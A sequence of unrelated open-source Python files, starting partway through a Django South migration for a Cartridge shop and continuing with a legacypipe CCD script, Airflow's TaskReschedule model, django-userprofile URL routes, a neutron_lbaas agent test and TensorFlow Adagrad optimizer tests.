('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'valid_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'valid_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}) }, 'shop.order': { 'Meta': {'ordering': "('-id',)", 'object_name': 'Order'}, 'additional_instructions': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'billing_detail_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_country': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_email': ('django.db.models.fields.EmailField', [], {'max_length': '75'}), 'billing_detail_first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}), 'billing_detail_postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}), 'billing_detail_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'billing_detail_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'discount_code': ('cartridge.shop.fields.DiscountCodeField', [], {'max_length': '20', 'blank': 'True'}), 'discount_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'item_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'key': ('django.db.models.fields.CharField', [], {'max_length': '40'}), 'shipping_detail_city': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_country': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_phone': ('django.db.models.fields.CharField', [], {'max_length': '20'}), 'shipping_detail_postcode': ('django.db.models.fields.CharField', [], {'max_length': '10'}), 'shipping_detail_state': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_detail_street': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'shipping_total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'shipping_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}), 'status': ('django.db.models.fields.IntegerField', [], {'default': '1'}), 'time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}), 'total': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'transaction_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}), 'user_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}) }, 'shop.orderitem': { 'Meta': {'object_name': 'OrderItem'}, 'description': ('django.db.models.fields.CharField', [], {'max_length': '200'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'order': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['shop.Order']"}), 'quantity': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'sku': ('cartridge.shop.fields.SKUField', [], {'max_length': '20'}), 'total_price': ('cartridge.shop.fields.MoneyField', [], {'default': "'0'", 'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'unit_price': ('cartridge.shop.fields.MoneyField', [], {'default': "'0'", 'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}) }, 'shop.product': { 'Meta': {'object_name': 'Product'}, 'available': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['shop.Category']", 'symmetrical': 'False', 'blank': 'True'}), 'content': ('mezzanine.core.fields.RichTextField', [], {}), 'date_added': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'null': 'True', 'blank': 'True'}), 'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}), 'expiry_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'gen_description': ('django.db.models.fields.BooleanField', [], {'default': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), 'keywords': ('mezzanine.generic.fields.KeywordsField', [], {'object_id_field': "'object_pk'", 'to': "orm['generic.AssignedKeyword']"}), 'keywords_string': ('django.db.models.fields.CharField', [], {'max_length': '500', 'blank': 'True'}), 'num_in_stock': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'publish_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'rating': ('mezzanine.generic.fields.RatingField', [], {'object_id_field': "'object_pk'", 'to': "orm['generic.Rating']"}), 'rating_average': ('django.db.models.fields.FloatField', [], {'default': '0'}), 'rating_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'related_products': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_products_rel_+'", 'blank': 'True', 'to': "orm['shop.Product']"}), 'sale_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'sale_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}), 'sale_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'sale_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'short_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}), 'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}), 'slug': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True', 'blank': 'True'}), 'status': ('django.db.models.fields.IntegerField', [], {'default': '2'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '500'}), 'unit_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'upsell_products': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'upsell_products_rel_+'", 'blank': 'True', 'to': "orm['shop.Product']"}) }, 'shop.productaction': { 'Meta': {'unique_together': "(('product', 'timestamp'),)", 'object_name': 'ProductAction'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'actions'", 'to': "orm['shop.Product']"}), 'timestamp': ('django.db.models.fields.IntegerField', [], {}), 'total_cart': ('django.db.models.fields.IntegerField', [], {'default': '0'}), 'total_purchase': ('django.db.models.fields.IntegerField', [], {'default': '0'}) }, 'shop.productimage': { 'Meta': {'ordering': "('_order',)", 'object_name': 'ProductImage'}, '_order': ('django.db.models.fields.IntegerField', [], {'null': 'True'}), 'description': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}), 'file': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'images'", 'to': "orm['shop.Product']"}) }, 'shop.productoption': { 'Meta': {'object_name': 'ProductOption'}, 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('cartridge.shop.fields.OptionField', [], {'max_length': '50', 'null': 'True'}), 'type': ('django.db.models.fields.IntegerField', [], {}) }, 'shop.productvariation': { 'Meta': {'ordering': "('-default',)", 'object_name': 'ProductVariation'}, 'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['shop.ProductImage']", 'null': 'True', 'blank': 'True'}), 'num_in_stock': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}), 'option1': ('cartridge.shop.fields.OptionField', [], {'max_length': '50', 'null': 'True'}), 'option2': ('cartridge.shop.fields.OptionField', [], {'max_length': '50', 'null': 'True'}), 'product': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'variations'", 'to': "orm['shop.Product']"}), 'sale_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'sale_id': ('django.db.models.fields.IntegerField', [], {'null': 'True'}), 'sale_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'sale_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'sku': ('cartridge.shop.fields.SKUField', [], {'max_length': '20', 'unique': 'True', 'null': 'True', 'blank': 'True'}), 'unit_price': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}) }, 'shop.sale': { 'Meta': {'object_name': 'Sale'}, 'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}), 'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "'sale_related'", 'blank': 'True', 'to': "orm['shop.Category']"}), 'discount_deduct': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'discount_exact': ('cartridge.shop.fields.MoneyField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'}), 'discount_percent': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '4', 'decimal_places': '2', 'blank': 'True'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'products': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['shop.Product']", 'symmetrical': 'False', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'valid_from': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}), 'valid_to': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}) }, 'sites.site': { 'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"}, 'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}), 'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) } } complete_apps = ['shop']
''' This script runs the legacypipe code on a single CCD. ''' from __future__ import print_function import numpy as np from legacypipe.survey import LegacySurveyData from legacypipe.runbrick import get_parser, get_runbrick_kwargs, run_brick class FakeLegacySurveyData(LegacySurveyData): def filter_ccd_kd_files(self, fns): if self.no_kd: return [] return fns def main(): from astrometry.util.ttime import Time t0 = Time() parser = get_parser() parser.set_defaults(wise=False) parser.add_argument('expnum', type=int, help='Exposure number') parser.add_argument('ccdname', help='CCD name (eg: "N4")') opt = parser.parse_args() optdict = vars(opt) verbose = optdict.pop('verbose') expnum = optdict.pop('expnum') ccdname = optdict.pop('ccdname') #print('optdict:', optdict) survey = FakeLegacySurveyData(survey_dir=opt.survey_dir, output_dir=opt.output_dir, cache_dir=opt.cache_dir) survey.no_kd = False ccds = survey.find_ccds(expnum=expnum, ccdname=ccdname) if len(ccds) == 0: print('Did not find EXPNUM', expnum, 'CCDNAME', ccdname) return -1 # Force the CCDs survey.ccds = ccds survey.no_kd = True ccd = ccds[0] print('Found CCD', ccd) awcs = survey.get_approx_wcs(ccd) ra,dec = awcs.radec_center() h,w = awcs.shape rr,dd = awcs.pixelxy2radec([1,1,w,w], [1,h,h,1]) # Rotate RAs to be around RA=180 to avoid wrap-around rotra = np.fmod((rr - ra + 180) + 360, 360.) # assume default pixscale pixscale = 0.262 / 3600 W = int(np.ceil((rotra.max() - rotra.min()) * np.cos(np.deg2rad(dec)) / pixscale)) H = int(np.ceil((dd.max() - dd.min()) / pixscale)) print('W, H', W, H) optdict.update(survey=survey) survey, kwargs = get_runbrick_kwargs(**optdict) kwargs.update(radec=(ra,dec), width=W, height=H, bands=[ccd.filter]) #if opt.brick is None and opt.radec is None: run_brick(None, survey, **kwargs) print('Finished:', Time()-t0) if __name__ == '__main__': main()
# # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """TaskReschedule tracks rescheduled task instances.""" from sqlalchemy import Column, ForeignKeyConstraint, Index, Integer, String, asc from airflow.models.base import ID_LEN, Base from airflow.utils.session import provide_session from airflow.utils.sqlalchemy import UtcDateTime class TaskReschedule(Base): """ TaskReschedule tracks rescheduled task instances. """ __tablename__ = "task_reschedule" id = Column(Integer, primary_key=True) task_id = Column(String(ID_LEN), nullable=False) dag_id = Column(String(ID_LEN), nullable=False) execution_date = Column(UtcDateTime, nullable=False) try_number = Column(Integer, nullable=False) start_date = Column(UtcDateTime, nullable=False) end_date = Column(UtcDateTime, nullable=False) duration = Column(Integer, nullable=False) reschedule_date = Column(UtcDateTime, nullable=False) __table_args__ = ( Index('idx_task_reschedule_dag_task_date', dag_id, task_id, execution_date, unique=False), ForeignKeyConstraint([task_id, dag_id, execution_date], ['task_instance.task_id', 'task_instance.dag_id', 'task_instance.execution_date'], name='task_reschedule_dag_task_date_fkey', ondelete='CASCADE') ) def __init__(self, task, execution_date, try_number, start_date, end_date, reschedule_date): self.dag_id = task.dag_id self.task_id = task.task_id self.execution_date = execution_date self.try_number = try_number self.start_date = start_date self.end_date = end_date self.reschedule_date = reschedule_date self.duration = (self.end_date - self.start_date).total_seconds() @staticmethod @provide_session def find_for_task_instance(task_instance, session=None): """ Returns all task reschedules for the task instance and try number, in ascending order. :param session: the database session object :type session: sqlalchemy.orm.session.Session :param task_instance: the task instance to find task reschedules for :type task_instance: airflow.models.TaskInstance """ TR = TaskReschedule return ( session .query(TR) .filter(TR.dag_id == task_instance.dag_id, TR.task_id == task_instance.task_id, TR.execution_date == task_instance.execution_date, TR.try_number == task_instance.try_number) .order_by(asc(TR.id)) .all() )
from django.conf.urls import * from django.views.generic import TemplateView from userprofile.views import * from django.conf import settings class DirectTemplateView(TemplateView): extra_context = None def get_context_data(self, **kwargs): context = super(self.__class__, self).get_context_data(**kwargs) if self.extra_context is not None: for key, value in self.extra_context.items(): if callable(value): context[key] = value() else: context[key] = value return context urlpatterns = patterns('', # Private profile url(r'^profile/$', overview, name='profile_overview'), url(r'^profile/edit/location/$', location, name='profile_edit_location'), url(r'^profile/edit/personal/$', personal, name='profile_edit_personal'), url(r'^profile/delete/$', delete, name='profile_delete'), url(r'^profile/getcountry_info/(?P<lat>[0-9\.\-]+)/(?P<lng>[0-9\.\-]+)/$', fetch_geodata, name='profile_geocountry_info'), # Avatars url(r'^profile/edit/avatar/delete/$', avatardelete, name='profile_avatar_delete'), url(r'^profile/edit/avatar/$', avatarchoose, name='profile_edit_avatar'), url(r'^profile/edit/avatar/crop/$', avatarcrop, name='profile_avatar_crop'), url(r'^profile/edit/avatar/crop/done/$', DirectTemplateView.as_view(template_name='userprofile/avatar/done.html', extra_context = {'section': 'avatar'}), name='profile_avatar_crop_done'), # Account utilities url(r'^email/validation/$', email_validation, name='email_validation'), url(r'^email/validation/processed/$', DirectTemplateView.as_view(template_name='userprofile/account/email_validation_processed.html'), name='email_validation_processed'), url(r'^email/validation/(?P<key>.{70})/$', email_validation_process, name='email_validation_process'), url(r'^email/validation/reset/$', email_validation_reset, name='email_validation_reset'), url(r'^email/validation/reset/(?P<action>done|failed)/$', DirectTemplateView.as_view(template_name='userprofile/account/email_validation_reset_response.html'), name='email_validation_reset_response'), url(r'^password/reset/$', 'django.contrib.auth.views.password_reset', {'template_name': 'userprofile/account/password_reset.html', 'email_template_name': 'userprofile/email/password_reset_email.txt' }, name='password_reset'), url(r'^password/reset/done/$', 'django.contrib.auth.views.password_reset_done', {'template_name': 'userprofile/account/password_reset_done.html'}, name='password_reset_done'), url(r'^password/change/$', 'django.contrib.auth.views.password_change', {'template_name': 'userprofile/account/password_change.html'}, name='password_change'), url(r'^password/change/done/$', 'django.contrib.auth.views.password_change_done', {'template_name': 'userprofile/account/password_change_done.html'}, name='password_change_done'), url(r'^reset/(?P<uidb36>[0-9A-Za-z]+)-(?P<token>.+)/$', 'django.contrib.auth.views.password_reset_confirm', {'template_name': 'userprofile/account/password_reset_confirm.html'}, name="password_reset_confirm"), url(r'^reset/done/$', 'django.contrib.auth.views.password_reset_complete', {'template_name': 'userprofile/account/password_reset_complete.html'}, name="password_reset_complete"), url(r'^login/$', 'django.contrib.auth.views.login', {'template_name': 'userprofile/account/login.html'}, name='login'), url(r'^logout/$', 'django.contrib.auth.views.logout', {'template_name': 'userprofile/account/logout.html'}, name='logout'), # Registration url(r'^register/$', register, name='signup'), url(r'^register/validate/$', DirectTemplateView.as_view(template_name='userprofile/account/validate.html'), name='signup_validate'), url(r'^register/complete/$', DirectTemplateView.as_view(template_name='userprofile/account/registration_done.html', extra_context={ 'email_validation_required': hasattr(settings, "REQUIRE_EMAIL_CONFIRMATION") and settings.REQUIRE_EMAIL_CONFIRMATION }), name='signup_complete'), # Users public profile url(r'^profile/(?P<username>.+)/$', public, name='profile_public'), )
# Copyright 2013 New Dream Network, LLC (DreamHost) # Copyright 2015 Rackspace # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import contextlib import mock from oslo_config import cfg from neutron_lbaas.agent import agent from neutron_lbaas.tests import base class TestLbaasService(base.BaseTestCase): def test_start(self): with mock.patch.object( agent.n_rpc.Service, 'start' ) as mock_start: mgr = mock.Mock() cfg.CONF.periodic_interval = mock.Mock(return_value=10) agent_service = agent.LbaasAgentService('host', 'topic', mgr) agent_service.start() self.assertTrue(mock_start.called) def test_main(self): logging_str = 'neutron.agent.common.config.setup_logging' with contextlib.nested( mock.patch(logging_str), mock.patch.object(agent.service, 'launch'), mock.patch('sys.argv'), mock.patch.object(agent.manager, 'LbaasAgentManager'), mock.patch.object(cfg.CONF, 'register_opts') ) as (mock_logging, mock_launch, sys_argv, mgr_cls, ro): agent.main() mock_launch.assert_called_once_with(mock.ANY)
# Copyright 2015 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== """Functional tests for aggregate operations.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np from tensorflow.python.eager import context from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import test_util from tensorflow.python.ops import embedding_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import resource_variable_ops from tensorflow.python.ops import variable_scope from tensorflow.python.ops import variables from tensorflow.python.platform import test from tensorflow.python.training import adagrad class AdagradOptimizerTest(test.TestCase): def doTestBasic(self, use_locking=False, use_resource=False, use_callable_params=False): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: if use_resource: var0 = resource_variable_ops.ResourceVariable([1.0, 2.0], dtype=dtype) var1 = resource_variable_ops.ResourceVariable([3.0, 4.0], dtype=dtype) else: var0 = variables.Variable([1.0, 2.0], dtype=dtype) var1 = variables.Variable([3.0, 4.0], dtype=dtype) grads0 = constant_op.constant([0.1, 0.1], dtype=dtype) grads1 = constant_op.constant([0.01, 0.01], dtype=dtype) learning_rate = lambda: 3.0 if not use_callable_params: learning_rate = learning_rate() ada_opt = adagrad.AdagradOptimizer( learning_rate, initial_accumulator_value=0.1, use_locking=use_locking) if not context.executing_eagerly(): ada_update = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values v0_val, v1_val = self.evaluate([var0, var1]) self.assertAllClose([1.0, 2.0], v0_val) self.assertAllClose([3.0, 4.0], v1_val) # Run 3 steps of adagrad for _ in range(3): if not context.executing_eagerly(): self.evaluate(ada_update) else: ada_opt.apply_gradients(zip([grads0, grads1], [var0, var1])) # Validate updated params v0_val, v1_val = self.evaluate([var0, var1]) self.assertAllCloseAccordingToType( np.array([-1.6026098728179932, -0.6026098728179932]), v0_val) self.assertAllCloseAccordingToType( np.array([2.715679168701172, 3.715679168701172]), v1_val) def testBasic(self): self.doTestBasic(use_locking=False) @test_util.run_in_graph_and_eager_modes def testBasicResource(self): self.doTestBasic(use_locking=False, use_resource=True) def testBasicCallableParams(self): with context.eager_mode(): self.doTestBasic( use_locking=False, use_resource=True, use_callable_params=True) def testBasicLocked(self): self.doTestBasic(use_locking=True) def testMinimizeSparseResourceVariable(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var0 = resource_variable_ops.ResourceVariable( [[1.0, 2.0], [3.0, 4.0]], dtype=dtype) x = constant_op.constant([[4.0], [5.0]], dtype=dtype) pred = math_ops.matmul(embedding_ops.embedding_lookup([var0], [0]), x) loss = pred * pred sgd_op = adagrad.AdagradOptimizer(1.0).minimize(loss) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values self.assertAllCloseAccordingToType([[1.0, 2.0], [3.0, 4.0]], self.evaluate(var0)) # Run 1 step of sgd sgd_op.run() # Validate updated params self.assertAllCloseAccordingToType([[0, 1], [3, 4]], self.evaluate(var0), atol=0.01) def testTensorLearningRate(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var0 = variables.Variable([1.0, 2.0], dtype=dtype) var1 = variables.Variable([3.0, 4.0], dtype=dtype) grads0 = constant_op.constant([0.1, 0.1], dtype=dtype) grads1 = constant_op.constant([0.01, 0.01], dtype=dtype) ada_opt = adagrad.AdagradOptimizer( constant_op.constant(3.0), initial_accumulator_value=0.1) ada_update = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values self.assertAllClose([1.0, 2.0], self.evaluate(var0)) self.assertAllClose([3.0, 4.0], self.evaluate(var1)) # Run 3 steps of adagrad for _ in range(3): ada_update.run() # Validate updated params self.assertAllCloseAccordingToType( np.array([-1.6026098728179932, -0.6026098728179932]), self.evaluate(var0)) self.assertAllCloseAccordingToType( np.array([2.715679168701172, 3.715679168701172]), self.evaluate(var1)) def testSparseBasic(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var0 = variables.Variable([[1.0], [2.0]], dtype=dtype) var1 = variables.Variable([[3.0], [4.0]], dtype=dtype) grads0 = ops.IndexedSlices( constant_op.constant( [0.1], shape=[1, 1], dtype=dtype), constant_op.constant([0]), constant_op.constant([2, 1])) grads1 = ops.IndexedSlices( constant_op.constant( [0.01], shape=[1, 1], dtype=dtype), constant_op.constant([1]), constant_op.constant([2, 1])) ada_opt = adagrad.AdagradOptimizer(3.0, initial_accumulator_value=0.1) ada_update = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values self.assertAllClose([[1.0], [2.0]], self.evaluate(var0)) self.assertAllClose([[3.0], [4.0]], self.evaluate(var1)) # Run 3 step of sgd for _ in range(3): ada_update.run() # Validate updated params self.assertAllCloseAccordingToType( np.array([[-1.6026098728179932], [2.0]]), self.evaluate(var0)) self.assertAllCloseAccordingToType( np.array([[3.0], [3.715679168701172]]), self.evaluate(var1)) def testSparseRepeatedIndices(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): repeated_index_update_var = variables.Variable( [[1.0], [2.0]], dtype=dtype) aggregated_update_var = variables.Variable( [[1.0], [2.0]], dtype=dtype) grad_repeated_index = ops.IndexedSlices( constant_op.constant( [0.1, 0.1], shape=[2, 1], dtype=dtype), constant_op.constant([1, 1]), constant_op.constant([2, 1])) grad_aggregated = ops.IndexedSlices( constant_op.constant( [0.2], shape=[1, 1], dtype=dtype), constant_op.constant([1]), constant_op.constant([2, 1])) repeated_update = adagrad.AdagradOptimizer(3.0).apply_gradients( [(grad_repeated_index, repeated_index_update_var)]) aggregated_update = adagrad.AdagradOptimizer(3.0).apply_gradients( [(grad_aggregated, aggregated_update_var)]) self.evaluate(variables.global_variables_initializer()) self.assertAllClose(aggregated_update_var, self.evaluate(repeated_index_update_var)) for _ in range(3): repeated_update.run() aggregated_update.run() self.assertAllClose(aggregated_update_var, self.evaluate(repeated_index_update_var)) def testSparseRepeatedIndicesResourceVariable(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var_repeated = resource_variable_ops.ResourceVariable( [1.0, 2.0], dtype=dtype) loss_repeated = math_ops.reduce_sum( embedding_ops.embedding_lookup(var_repeated, [0, 0])) var_aggregated = resource_variable_ops.ResourceVariable( [1.0, 2.0], dtype=dtype) loss_aggregated = 2 * math_ops.reduce_sum( embedding_ops.embedding_lookup(var_aggregated, [0])) update_op_repeated = adagrad.AdagradOptimizer( 2.0).minimize(loss_repeated) update_op_aggregated = adagrad.AdagradOptimizer( 2.0).minimize(loss_aggregated) self.evaluate(variables.global_variables_initializer()) self.assertAllCloseAccordingToType( self.evaluate(var_repeated), self.evaluate(var_aggregated)) for _ in range(3): update_op_repeated.run() update_op_aggregated.run() self.assertAllCloseAccordingToType( self.evaluate(var_repeated), self.evaluate(var_aggregated)) def testSparseStability(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): shape = [1, 6] var0 = variables.Variable( [[ 0.00872496, -0.106952, 0.110467, 0.226505, -0.0147257, -0.0105945 ]], dtype=dtype) grads0 = ops.IndexedSlices( constant_op.constant( [[ -5.91278e-05, 5.31673e-05, -2.5779e-06, 4.29153e-05, -8.4877e-05, -9.48906e-05 ]], shape=shape, dtype=dtype), constant_op.constant([0]), constant_op.constant(shape)) ada_opt = adagrad.AdagradOptimizer(1.0, initial_accumulator_value=0.1) ada_update = ada_opt.apply_gradients(zip([grads0], [var0])) self.assertEqual(["accumulator"], ada_opt.get_slot_names()) slot0 = ada_opt.get_slot(var0, "accumulator") init = variables.global_variables_initializer() for _ in range(100): init.run() ada_update.run() self.assertAllCloseAccordingToType( np.array([[0.1, 0.1, 0.1, 0.1, 0.1, 0.1]]), self.evaluate(slot0)) self.assertAllCloseAccordingToType( np.array([[ 0.00891194, -0.10712013, 0.11047515, 0.22636929, -0.0144573, -0.01029443 ]]), self.evaluate(var0)) def testSharing(self): with ops.Graph().as_default(): for dtype in [dtypes.half, dtypes.float32, dtypes.float64]: with self.cached_session(): var0 = variables.Variable([1.0, 2.0], dtype=dtype) var1 = variables.Variable([3.0, 4.0], dtype=dtype) grads0 = constant_op.constant([0.1, 0.1], dtype=dtype) grads1 = constant_op.constant([0.01, 0.01], dtype=dtype) ada_opt = adagrad.AdagradOptimizer(3.0) # Apply the optimizer twice. Both applications will use # the same accums. ada_update1 = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) ada_update2 = ada_opt.apply_gradients( zip([grads0, grads1], [var0, var1])) self.assertEqual(["accumulator"], ada_opt.get_slot_names()) slot0 = ada_opt.get_slot(var0, "accumulator") self.assertEqual(slot0.get_shape(), var0.get_shape()) slot1 = ada_opt.get_slot(var1, "accumulator") self.assertEqual(slot1.get_shape(), var1.get_shape()) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values. self.assertAllClose([1.0, 2.0], self.evaluate(var0)) self.assertAllClose([3.0, 4.0], self.evaluate(var1)) # Mix the first and the second adagrad for 3 steps. ada_update1.run() ada_update2.run() ada_update1.run() # Validate updated params (the same as with only 1 Adagrad). self.assertAllCloseAccordingToType( np.array([-1.6026098728179932, -0.6026098728179932]), self.evaluate(var0)) self.assertAllCloseAccordingToType( np.array([2.715679168701172, 3.715679168701172]), self.evaluate(var1)) def testDynamicShapeVariableWithCallableInit(self): with ops.Graph().as_default(): var0 = variable_scope.get_variable("var0", initializer=constant_op.constant(1.), validate_shape=False) grads0 = constant_op.constant(0.1, dtype=dtypes.float32) learning_rate = lambda: 3.0 ada_opt = adagrad.AdagradOptimizer( learning_rate, initial_accumulator_value=0.1, use_locking=True) if not context.executing_eagerly(): ada_update = ada_opt.apply_gradients( zip([grads0], [var0])) self.evaluate(variables.global_variables_initializer()) # Fetch params to validate initial values v0_val = self.evaluate([var0]) self.assertAllClose([1.0], v0_val) # Run 3 steps of adagrad for _ in range(3): if not context.executing_eagerly(): self.evaluate(ada_update) else: ada_opt.apply_gradients(zip([grads0], [var0])) # Validate updated params v0_val = self.evaluate([var0]) self.assertAllCloseAccordingToType( np.array([-1.6026098728179932]), v0_val) if __name__ == "__main__": test.main()
